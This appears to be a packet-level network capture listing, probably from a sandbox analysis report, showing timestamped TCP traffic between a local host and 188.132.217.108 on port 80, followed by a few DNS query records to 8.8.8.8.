                                                                                                                    Aug 6, 2022 09:20:18.396390915 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.396431923 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.396445036 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.396466970 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.396472931 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.396500111 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.396512985 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.396537066 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.396553993 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.396564960 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.396596909 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.396636963 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.396637917 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.396652937 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.396703005 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.396714926 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.396758080 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.396786928 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.396799088 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.396816015 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.396840096 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.396850109 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.396881104 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.396900892 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.396923065 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.396935940 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.396965027 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.396989107 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.397008896 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.397028923 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.397049904 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.397073030 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.397092104 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.397128105 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.397133112 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.397145987 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.397181988 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.397216082 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.397228956 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.397244930 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.397270918 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.397310019 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.397310972 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.397351980 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.397381067 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.397392035 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.397418022 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.397432089 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.397456884 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.397475004 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.397491932 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.397514105 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.397521973 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.397556067 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.397582054 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.397598028 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.397624016 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.397638083 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.397650003 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.397679090 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.397706032 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.397718906 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.397738934 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.397761106 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.397804022 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.397809029 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.397844076 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.397881031 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.397883892 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.397901058 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.397924900 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.397939920 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.397964954 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.397993088 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.398006916 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.398017883 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.398086071 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.398248911 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.443254948 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.443376064 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.443407059 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.443435907 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.443444014 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.443476915 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.443480015 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.443519115 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.443521976 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.443559885 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.443561077 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.443602085 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.443605900 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.443646908 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.443649054 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.443687916 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.443692923 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.443739891 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.443742037 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.443782091 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.443783045 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.443821907 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.443821907 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.443861961 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.443865061 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.443902969 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.443903923 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.443942070 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.443945885 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.443981886 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.443983078 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.444021940 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.444025040 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.444062948 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.444063902 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.444103956 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.444107056 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.444143057 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.444145918 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.444183111 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.444184065 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.444226027 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.444226027 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.444264889 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.444267988 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.444308996 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.444309950 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.444350958 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.444355011 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.444392920 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.444392920 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.444434881 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.444436073 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.444475889 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.444478035 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.444515944 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.444516897 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.444556952 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.444557905 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.444597960 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.444600105 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.444638014 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.444639921 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.444679976 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.444683075 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.444720030 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.444720984 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.444761992 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.444765091 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.444806099 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.444806099 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.444845915 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.444847107 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.494012117 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.494020939 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.494052887 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.494057894 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.494092941 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.494101048 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.494132042 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.494139910 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.494172096 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.494177103 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.494214058 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.494218111 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.494254112 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.494260073 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.494296074 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.494298935 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.494334936 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.494339943 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.494374037 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.494379044 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.494415045 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.494419098 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.494455099 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.494462013 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.494494915 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.494502068 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.494534969 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.494540930 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.494575977 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.494585037 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.494618893 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.494626045 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.494658947 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.494667053 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.494699001 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.494705915 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.494739056 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.494745016 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.494777918 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.494790077 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.494818926 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.494822979 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.494858980 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.494864941 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.494899988 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.494909048 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.494941950 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.494950056 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.494981050 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.495007038 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.495021105 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.495033979 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.495062113 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.495071888 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.495100975 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.495107889 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.495141029 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.495148897 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.495182037 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.495186090 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.495222092 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.495225906 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.495265007 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.495266914 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.495304108 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.495309114 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.495374918 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.495435953 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.495435953 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.495446920 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.495481014 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.495487928 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.495529890 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.495529890 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.495572090 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.495583057 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.495615959 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.495620966 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.495655060 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.495667934 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.495696068 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.495704889 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.495735884 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.495743036 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.495776892 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.495783091 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.495817900 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.495826960 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.495857954 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.495868921 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.495898962 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.495908976 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.495942116 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.495954990 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.495980978 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.495992899 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.496021986 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.496030092 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.496062994 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.496088982 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.496103048 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.496107101 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.496145964 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.496160984 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.496185064 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.496197939 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.496226072 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.496248007 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.496265888 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.496267080 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.496304989 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.496311903 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.496345997 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.496352911 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.496387005 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.496392965 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.496427059 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.496439934 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.496480942 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.497054100 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.497519970 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.497544050 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.497565031 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.497589111 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.497612000 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.497637033 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.497636080 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.497654915 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.497661114 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.497664928 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.497689962 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.497710943 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.497713089 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.497729063 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.497735023 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.497756958 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.497778893 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.497780085 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.497793913 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.497802973 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.497826099 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.497833014 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.497849941 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.497872114 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.497879028 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.497888088 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.497895002 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.497901917 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.497920036 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.497925997 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.497942924 CEST8049172188.132.217.108192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 6, 2022 09:20:16.169598103 CEST | 55868 | 53 | 192.168.2.22 | 8.8.8.8
Aug 6, 2022 09:20:16.339459896 CEST | 53 | 55868 | 8.8.8.8 | 192.168.2.22
Aug 6, 2022 09:20:17.766623020 CEST | 49688 | 53 | 192.168.2.22 | 8.8.8.8
